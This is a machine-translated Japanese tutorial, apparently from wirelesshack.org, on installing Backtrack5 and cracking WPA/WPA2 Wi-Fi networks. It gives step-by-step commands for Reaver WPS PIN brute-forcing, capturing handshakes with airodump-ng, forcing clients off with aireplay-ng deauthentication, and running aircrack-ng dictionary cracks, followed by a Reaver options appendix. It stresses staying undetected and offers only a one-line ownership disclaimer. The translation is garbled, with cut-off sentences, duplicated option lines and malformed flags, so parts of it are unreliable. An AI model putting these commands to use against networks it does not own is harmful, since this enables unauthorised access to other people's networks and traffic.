ステップバイステップBacktrack5and wireless Hacking basics
Backtrack5のインストール
Backtrack5R3Live CDの作成
ハードドライブへのインストール
VMwareでのインストールと実行
Reaver
WPA辞書攻撃
ハンドシェイクとデータキャプチャの取得
aircrackと辞書を使用してWPAデータキャプチャをクラックする
www。ワイヤレスハックorg
ステップバイステップBacktrack5and wireless Hacking basics
本書のすべての情報は、ネットワークセキュリティ管理者による使用または独自のワイヤレス接続のセキ
はじめに
Backtrack5R3は、侵入テストのためのツールの全体の多くを持つ悪名高いデジタルフォレンジックと侵入検出ソフトウェアバンドルであり、それはLinux
Backtrackを使用したことがない場合は、デジタルフォレンジック、侵入検知、侵入テストに使用するのに最適なソフトウェアであることを本当に知る必要が
無線攻撃にはさまざまな種類がありますが、実際には主に2種類しか使用されていません。 私はそれぞれを一歩一歩進んでいきます。 あなたが持っている場合Backtrack5インストールされている最初の章は、あなたが使用したいハックに直接スキップすることができます.
ワイヤレスハックの主な二つのタイプは、WPA辞書攻撃、およびReaverです。
以前はWEPがルーターで使用されていた主な暗号化でしたが、WEPは解読が容易であることで悪名高く、これ以上はほとんど見られませんでした。 WPAまたはWPA2は、実際には同じものですが、ルーターが暗号化され、解読がはるかに困難になっています。
これらの攻撃に対する考え方は、攻撃そのものと同じくらい重要です。 ポイントアンドクリックオプションはありません。 コマンドを学習し、ターミナルウィンドウに入力する必要があります。
で遊ぶために複数のルータを購入することも良い考えです。 ヤードセールで見つけられるべき沢山があり、交換は安いので会う。 異なるメーカーは異なることを行い、異なるセットアップを持っているので、いくつかは別の弱点を持っています。
また、内部ワイヤレスネットワークアダプタはバックトラックとワイヤレス侵入テストでは動作しないということです。 これは、アダプタがサポートされていないためではなく、サポートされていない可能性があります。 これは、ほとんどのワイヤレスチップセットがパケット注入やワイヤレス攻撃を行うために必要なものをサポートしていないためです。
現在使用されている最も一般的なワイヤレスUSBアダプタは、Alfa AWUS036HとAlfa AWUS036NHです。 私は両方を使用しており、両方が良いですが、可能であれば、それはワイヤレスNをサポートしているので、アルファAWUS036NHを取得します。www.wirelesshack.org/backtrack-compatible-adapters
Backtrack5のインストール
Backtrack5は無料でダウンロードおよびインストールでき、ここからダウンロードできます。 http://www.wirelesshack.org/backtrack-5-download
バックトラックファイルは、ダウンロードするファイルの種類に応じて2-4GBの大きさです。 Backtrackのインストール、ハードドライブへのインストール、DVDまたはフラッシュドライブからの起動、または仮想化での実行には3つの方法があります。
各インストールの仕組みについて説明しますが、Backtrack5を初めて使用する場合は、Backtrack5ISOをDVDまたはフラッシュドライブに書き込み、そこから起動するのが最も簡単な方法であり、もちろんコンピュータが再起動すると、正しく保存されていないとデータが失われる可能性があります。
Backtrack5をハードドライブにインストールすることは、ディスクから起動し、インストールを選択し、時間、日付、言語、ディスクのフォーマットなどの質問に答える
仮想化内でBacktrack5を実行するのが最も一般的な方法かもしれません。 主な理由は、windowsなどの使い慣れたオペレーティングシステムを同時に実行することができ、ファイルは簡単に両者の間で転送されます。 これはコンピューティングリソースを占有し、BacktrackがUSBアダプタを認識しないなどの問題が発生した場合に別のトラブルシューティング層を追加す
私個人的には、Backtrack5とWindows7でVMware Playerを実行しています。 あなたが始めたばかりの場合は、ブートDVDを使用して起動し、後で仮想化に移りますが、これは個人的なオプションであり、オペレーティングシステムの使
Backtrack5R3ライブCDの作成
DVDまたはフラッシュドライブを起動するには、Backtrack5ISOが必要になります。 ダウンロードはこちらhttp://www.wirelesshack.org/backtrack-5-downloadダウンロードサイトが最近変更されたため、トレントを使用してダウンロードする必要があります。 あなたが急流をダウンロードしたことがない場合、それは簡単です。 最初のダウンロードとトレントクライアントをインストールし、最も人気のあるのはUtorrentのですが、多くがあります。 次に、トレントへのリンクをクリックすると、クライアントがファイルをダウンロードします。
ISO書き込みソフトウェアが必要になります。 疑問がある場合は、Power ISOを使用すると、特定のバージョンのNeroなどのISO書き込みソフトウェアが既に使用されている可能性が高くなります。
(私はPower ISOとは関係がありませんそれは単に私が使用しているものなので、この例ではそれを使用します。)
ISOがダウンロードされたら、backtrack5ISOを書き込みソフトウェアにロードし、DVDに書き込みます。
ISOがDVDに書き込まれた後、ライブCDとして使用するか、ハードドライブにインストールするために使用できるようになりました。
DVDから起動するには、コンピュータのドライブに入れ、ディスクから起動するコンピュータの設定を確認してください。 ほとんどのコンピュータには、起動オプションボタンを押すか、自動的にディスクを起動します。
DVDから起動したら、次のメニューに来るはずです。
最初のオプション”デフォルトのブートテキストモード”を選択すると、コンピュータはDVDからログインまで起動します。
Backtrackのデフォルトのユーザー名とパスワードはroot then toorです。
一度ログインし、コマンドプロンプト(ポンド記号#)で”startx”と入力すると、グラフィカルユーザーインターフェイスが開始されます。
バックトラックを作成するための簡単な手順5ライブCD
- バックトラックISOhttp://www.wirelesshack.org/backtrack-5-download
- PowerISOまたはISO書き込みユーティリティをお持ちでない場合はダウンロードしてください。 http://www.poweriso.com/download.htm 3. PowerISO4をインストールします。 DVDバーナーにDVDをインストールし、PowerISOを開きます。
- PowerISOでバックトラックイメージファイルを開き、書き込みをクリックしてバックトラックイメージファイルをDVDに書き込みます。
- あなたがBacktrackに好きなコンピュータを起動するためにDVDを使用してください。
- ユーザー名はrootです。 パスワードはtoorです。
- コマンドプロンプトでstartxと入力してGUIに入ります。
ハードドライブへのインストール
既存のオペレーティングシステムは一掃され、これが行われるとBacktrackのみがインストールされます。 このため、以前にこれを行っていない限り、ハードドライブにインストールすることはお勧めしません。
Backtrackは、既存のオペレーティングシステムと一緒にデュアルブートに設定することができますが、デュアルブートの方法を説明する方がより高度です。 何かがうまくいかない場合は、既存のオペレーティングシステムがなくなったり、破損します。
オペレーティングシステムを理解していない場合は、他のオプションを使用するか、DVDから起動しますが、Backtrackをインストールしないか、VMwareでBacktrackを実行します。
ハードドライブにインストールするには、ISOをDVDに書き込む必要があります。 これは上記のDVDを起動するのと同じです。 BacktrackがGUIに入ると、ファイルがありますBacktrack.sh デスクトップ上で。 これをダブルクリックすると、backtrackがハードドライブにインストールされます。
クイックステップハードドライブにBacktrack5をインストールします。
1Backtrackライブ環境を起動します。
2ログインユーザー名root、パスワードtoor。
3プロンプトで、startxと入力してGUIに入ります。
4*インストールをダブルクリックしますBacktrack.sh デスクトップ上で。
5時間、日付地域などの画面の指示に従ってください。
VMwareを使用してインストールして実行する
二つのオペレーティングシステムを同時に実行することは、今では非常に一般的であり、比較的簡単に行 二つのことは、バックトラック5VMwareイメージ、およびVMware PlayerまたはWorkstationが必要になります。
知らない人のために、仮想的に別のオペレーティングシステム内で別のオペレーティングシステムを実行する方法です。 基本的に、Windowsを実行していて、Backtrack5インストールを同時に実行したい場合は、VMwareでこれを行うことができます。
VMwareは非常にうまく動作し、かなり最近のコンピュータを持っている限り、正常に動作するはずです。 あなたは古いラップトップや古いコンピュータを持っている場合は、ISOが良いかもしれません。 主な理由は、ISOはディスクまたは任意の起動可能なデバイスに書き込み、から起動することができます。 Backtrack5がISOから起動されると、backtrack5はバックグラウンドでWindowsを実行しません。
無料版はありますが、VMware workstationはまったく安くはありません。 あなたがそれをチェックアウトしたい場合は、VMware Workstationのための30日間の無料試用版があります。
VMware Workstationは無料ではありませんが、VMware Playerという無料版があります。 VMware PlayerにはWorkstationのすべてのオプションが付属しているわけではありませんが、動作し、Backtrack5を正常に実行します。
VMware Playerはこちらからダウンロードできますhttp://www.vmware.com/products/playerVMware Playerの無料ダウンロードを見つけるには、下にスクロールする必要があります。
VMware Playerを入手したら、Backtrack5サイトからVMwareイメージファイルが必要になります。http://www.wirelesshack.org/backtrack-5-download。
VMwareイメージは、VMwareに直接ロードして使用する準備ができるプリセットアップインストールです。
VMware playerとBacktrack5VMwareイメージの両方がダウンロードされたら、VMware Playerを実行してインストールし、デフォルトのオプションに従います。
Backtrack5VMwareイメージファイルを抽出する必要があり、その中にファイルの束を持つ独自のフォルダを作成します。
すべてのファイルの抽出が完了したら、VMware Playerを実行し、右クリックして”仮想マシンを開きます。”ダイアログボックスは、抽出されたBacktrack5VMwareイメージを持つフォルダに直接表示されます。
のために一つのファイルだけが出てきます。VMX拡張機能それをクリックすると、仮想マシンを再生してBacktrack5を実行することができます。
Backtrack5とVMware playerをインストールするための簡単な手順
- VMwareをダウンロードしますwww.vmware.com/products/player.
- Backtrack VMwareイメージファイルをダウンロードします。 http://www.wirelesshack.org/backtrack-5-ファイルをダウンロードして抽出します。
- Vmwareのインストール:デフォルトのオプションに従います。
- VMwareがインストールされたら、仮想マシンを開き、VMware Backtrack5イメージファイルの場所に移動し、ファイルをクリックします。 Backtrack5が開き、ログオン画面が表示されます。 ユーザー名はroot、パスワードはtoorです。
- ユーザー名はrootで、パスワードはtoorです。 あなたがタイプstartxにログインしているとBacktrackはGUIに開きます。
Reaver
使用するコマンド。Wlan0
wash-i mon0-C
reaver-i mon0-b(BSSID)-vv
(–vvは二つのVではなく、Wlan0
wlan0
wlan0
wlan0
wlan0
wlan0
wlan0
wlan0
wlan0
wlan0
wlan0)
Reaverは、長い時間で一緒に来て最高のツールの一つです。 WPAが実装され、WEPが無線暗号化を支配する前に、任意のネットワークは簡単にクラックすることができます。 しかし、WPAが標準になったとき、それははるかに困難になりました、辞書攻撃方法を使用することが唯一の本当の選択肢でした。 その後、リーバーが来た。
Reaverは、WPSまたはWi-fi Protected Setupと呼ばれるルータに見つかった欠陥によって動作します。 WPSは、無線デバイスがルータを見つけて接続することを容易にします。 WPSの問題は、誰かが暗号化を回避できるようにする欠陥があることです。
ルータがWPSを有効にしている場合、暗号化をクラッキングする必要はなくなりました。 それをバックドアのように考えてください。
ルータがWPSを有効にしている場合、通常は2〜10時間でクラックされる可能性があります。
“Wi-Fi保護されたセットアップ、またはWPS。 これは、簡単なセットアッププロセスを提供することを目的とした多くのルータに存在する機能であり、デバイスにハードコードされたPINに結びついて
ReaverはこれらのPinの欠陥を悪用し、その結果、十分な時間をかけてWPAまたはWPA2パスワードを明らかにすることができます。 ReaverはWPA暗号化自体を試みませんが、WPSを使用してその周りを回り、パスワードを表示します。”(ウィキペディア)
他の攻撃と同様に、これにはいくつかの問題があります。 信号強度のような、強い信号はほとんど絶対必要です。 あまりにも多くのピンがすぐに多くのサービス拒否攻撃のように、PCをクラッシュさせることができ、それにスローされた場合にも、いくつかのルー
Reaverには、これらの問題に対処するために使用できる多くのオプションまたはスイッチがあります。 私が以下で使用している例は基本的なものです。 Reaverで使用するコマンドはさらに多くありますが、”reaver/?”、または付録には、Reaverで使用できるコマンドの完全なリストがあります。
最初に行う必要があるのは、ワイヤレスUSBアダプタを有効にすることです。
Backtrack5を起動し、二つのターミナルウィンドウを開きます。
“airmon-ng”コマンドを実行して、BacktrackがワイヤレスUSBアダプタを認識しているかどうかを確認します。 それはチップセットと一緒に”Wlan”を表示する必要があります。
ワイヤレスUSBアダプタが動作したら、それを有効にする必要があります。 これを行うには、次のコマンドを実行します”airmon-ng start wlan0″
すべてがうまくいけば、画面はいくつかの情報でスクロールし、mon0で有効になっています。
WPS対応ルータを見つけることは、”wash”コマンドが来るまで、これは難しいために使用される次のステップです。
“wash”コマンドは問題があり、正常に動作していないことで悪名高いものでした。 基本的には、”wash”コマンドが出て、ルータがWPSを有効にしているかどうかを通知するので、Reaverを実行する時間を無駄にしません。 私はBacktrack5とKali Linuxの両方で私のために働いている修正を見つけたと信じています。 まず、このようなディレクトリを作成します。
“MKdir/etc/reaver”
次に、washコマンドを実行します
“wash-i mon0-C”
(つまり、キャピトルCです)
BSSIDをコピーし、後で必要に応じて貼り付け、CTRL+Cを押して、ワイヤレスUSBアダプタを使用してターミナルウィンドウを停止します。
(何も起動しない場合、WPS対応ルータは手の届かないところにありません。 あなたの手の届くところにすべてのアクセスポイントを表示するには、次のコマンドを実行します。 “airodump-ng mon0”. Washコマンドが何も見つからない場合にのみこれを行います)
今、私たちはReaverを使用することができます。 “Wash”コマンドを実行している端末ウィンドウが、その中のCTRL+Cを押してワイヤレスUSBアダプタを積極的に使用していないことを確認してくださ BSSIDをコピーして貼り付けることができます。
第二のターミナルウィンドウで、次のコマンドを実行します。
“reaver-i mon0-b(Target BSSID)–vv”
(-vvは二つのVではありませんW)
Reaverの実行を開始する必要があります。
Reaverが実行され、ルータのPin番号に対するブルートフォース攻撃が開始されます。 それは無線パスワードを通常2-10時間見つけるまで動きます。<3094><2209>WPA辞書攻撃<1296><2691>WPAとWPA2は無線デバイスの最新の暗号化ですが、クラッキングする限りは同じですので、ここからWPAを使用します。
辞書攻撃は、理解するのが最も簡単ですが、パスワードを見つける可能性が最も低いのです。 それは動作しますが、それが使用される辞書と計算能力に依存するため、これはしばしば最後の手段です。
基本的には、誰かがルータにログインすると、ルータのデータキャプチャが無線でキャプチャされます。 次に、名前の束と名前/数字の組み合わせを持つ辞書ファイルを使用して、パスワードが見つかるまでデータキャプチャをスローします。
誰かがその人を知っていれば、彼らはパスワードを推測することができるかもしれませんが、そうでなければ、これは長い時間がかかり、何も見つ あなたがこの方法を使用して立ち往生している場合は、パスワードがどのように構造化されるかを考えることは、コンピューティングパワー データキャプチャは、物事を分割するために、複数のコンピュータ間でコピーすることができます。 あるGのAからFへの別のGのZへのAからFへのZへのA。 クラウドコンピューティングは、他の誰かのコンピューティングパワーなどを活用するためのオプションかもしれません。
レインボーテーブルやビデオカード攻撃などの他の方法もありますが、WPAを解読する最も簡単または最も簡単な方法はブルートフォースを使用することです。 これが基本的に機能する方法は、WPA暗号化で可能な限り多くの単語の組み合わせを割れるまで投げるために使用する大きな辞書があることです。 パスワードが簡単であれば、それは多くの異なる数字の文字の組み合わせと長い言い換えであれば、それははるかに困難になり、それは、迅速にそれを見
ハンドシェイクの取得とデータキャプチャの取得
コマンドが使用されます。
airmon-ng
airmon-ng start wlan0
airodump-ng mon0
Backtrackが起動して実行されている必要があります。
二つのターミナルウィンドウを開きます
コマンド”airmon-ng”を実行して、USBアダプタが表示されていないかどうかを確認します。 この例では、RTL8187Lチップセット
を使用するAlfa AWUS036Hを使用していますアダプタが接続されていることがわかったら、このコマンドを実行してア
airmon-ng start wlan0
すべてがうまくいけば、画面はいくつかの情報でスクロールし、mon0で有効になっていると言います。 これを使用する場合は、mon1またはmon2で有効になる場合があります。
ここで、どのルータまたはアクセスポイント(AP)がそこにあるかを確認したいので、このコマンドを実行します。
airodump-ng mon0
ここでは、必要なAPをターゲットにしてBSSIDをコピーします。 コマンドを停止し、BSSIDをコピーするには、CTRL+Cを使用します。
ここで、元の端末をそのままにして、2番目の開いている端末に移動します。 ここでは、選択したAPポイントでデータキャプチャを行うためのアダプタを設定します。 これを行った後、ワイヤレスデバイスがルーターに接続するのを待つ必要があり、データキャプチャを行います。 これを行うには、次のコマンドを実行します。
airodump-ng-c(channel)-w(ファイル名)–bssid(APのbssid)mon0
だから私にとっては
airodump-c1-w MyWpaCatch–bssid00:14:D1:EA:C4:3d mon0
その後、データキャプチャのためにAPを監視する必要があります。
この時点で、誰かがルーターにワイヤレスで接続するのを待つだけです。 これは、任意のデバイスにすることができます彼らのラップトップ、デスクトップやスマートフォン。 私たちが待っていれば、私たちはパッシブモードにとどまり、誰も私たちがそこにいることを検出することはできません。 下の端末(この例では)がポップアップ表示され、これが発生すると右上にWPAハンドシェイクが表示されます。
誰かが無線デバイスをルータに接続していることを知っている場合、認証を解除するか、再接続を強制的に蹴ることで、これを高速化する方法があります。 これはルータによって記録される可能性が最も高いので、これは受動的な方法ではありません。 これを行うには、別のターミナルウィンドウを開き、次のように入力します。
Aireplay-ng-0 5-a(Target AP BSSID)mon0
私にとっては、これは
aireplay-ng-0 5-a00:14:D1:EA:C4:3D mon0
AIRCRACKと辞書を使用してWPAデータキャプチャをクラックする
あなたはすでにWPAハンドシェイクファイルとバックトラック5を実行している必要があります。
WPAハンドシェイクのデフォルトのストレージは/rootの下にあり、あなたがそれを呼んだ名前の下にあります。 私たちが使用する辞書は、/pentest/passwords/wordlistsの下にbacktrackに組み込まれており、darkc0deと呼ばれています。lst.
良い辞書を取得するのは難しいことができますBacktrack5内には、ブルートフォース法を説明するために使用する辞書がいくつかありますが、サイズは限られていますが、最も簡単なパスフレーズ以外のすべてに対して役に立たないようにしています。
aircrackを使用してクラッキングを行い、これを行うコマンドは次のとおりです。
aircrack-ng(file name)-w(dictionary location)
ここで、ファイル名はキャプチャしたハンドシェイクファイ この2つのファイルがどこにあるかの場所とその名前はあなた次第です。 私が上で言ったように、ハンドシェイクファイルの通常のデフォルトの場所は/rootの下にあり、あなたがそれを呼んだものは何でもあります。 私たちはdarkc0deを使用します。この例のlst辞書は、/pentest/passwords/wordlistsディレクトリの下にあります。したがって、これを行うためのコマンドは次のようになります。
aircrack-ng/root/mywpacatch-05。cap-w/pentest/passwords/wordlists/darkc0de.lst
右に行ったら、aircrackが開始され、辞書でWPAハンドシェイクキャプチャをクラックしようとするはずです。
辞書がそれを見つけた場合、それは次のように表示されますそうでない場合は、別の辞書を使用する必要があります。 この例では、テキスト辞書ファイルを編集し、パスワードを入力して、見つかったときの外観を表示しました。
結論
この本の情報は、Backtrack5を使用したワイヤレスルーターに対する現在のハックの基本的な概要を読者に与えることです。 Reaverなどのコマンドで使用できるオプションやスイッチは、コマンドを入力してから”/?”と入力するだけです。”などの他のオプションを表示するには、”reaver/?”. 付録では、これらのオプションを見ることができます。
www.wirelesshack.org
4WiFi Protected Setup Attack Tool
Copyright(c)2011,Tactical Network Solutions,Craig Heffner
必要な引数:
-i,–interface=(wlan)使用するモニターモードインターフェイスの名前
-b,–bssid=(mac)ターゲットAPのBSSID
オプションの引数:
-i,–interface=(wlan)使用するモニターモードインターフェイスの名前
-b,–bssid=(mac)ターゲットAPのBssid
オプションの引数:
-i,–interface=(wlan)ターゲットAPのBssid
オプションの引数:
-m,–Mac=(Mac)ホストシステムのMac
-E,–Essid=(Ssid)ターゲットApのEssid
-c,–channel=(channel)802を設定します。11インターフェイスのチャネル(implies-f)
-o,–out-file=(file)ログファイルに出力を送信
-s,–session=(file)前のセッションファイルを復元
-C,–exec=(command)pinリカバリが成功したときに指定されたコマンドを実行
-D,–daemonize Daemonize reaver
-a,–autoターゲットAPに最適な高度なオプションを自動検出
-a,–auto-f,–fixedチャネルホッピングを無効にする
-5,–5ghz5ghz802.11チャネルを使用する
-v,–verbose重大でない警告を表示する(詳細は-vv)
-q,–Quiet重要なメッ:
-p,–pin=(wps pin)指定された4桁または8桁のWPS pinを使用します
-d,–delay=(seconds)pin試行間の遅延を設定します
-l,–lock-delay=(seconds)APがwps pin試行をロックした場合の待機時間を設定します
-g,–max-attempts=(num)numピン試行後に終了します
-x,–fail-wait=(秒)10回の予期しない障害が発生した後にスリープする時間を設定します
-r,–recurring-delay=<x:y>Xピンの試行ごとにy秒のスリープ
-t,–timeout=(秒)受信タイムアウト期間を設定
-T,–m57-timeout=(秒)M5/M7タイムアウト期間を設定
-A,–no-associate APとの関連付けを行わない(別のアプリケーションによって行わなければならない)
-N,–no-nacksは、順不同のパケットが受信されたときにNACKメッセージを送信しない
-n,–no-nacksは、順不同のパケットが受信されたときにNACKメッセージを送信しない
-N,–no-nacksは、順不同のパケットが受信されたときにNACKメッセージを送信しない
-N,–no-nacksは、順不同のパケットが受信されたときにNACK5480>-s,–dh-smallクラック速度を向上させるために小さなdhキーを使用します
-l,–ignore-locksターゲットapによって報告されたロック状態を無視します
-e,–Eap-Terminate eap fail packet
-n,–nack target ap ALWAYS 例:
reaver-i mon0-b00:90:4C:C1:AC:21-vv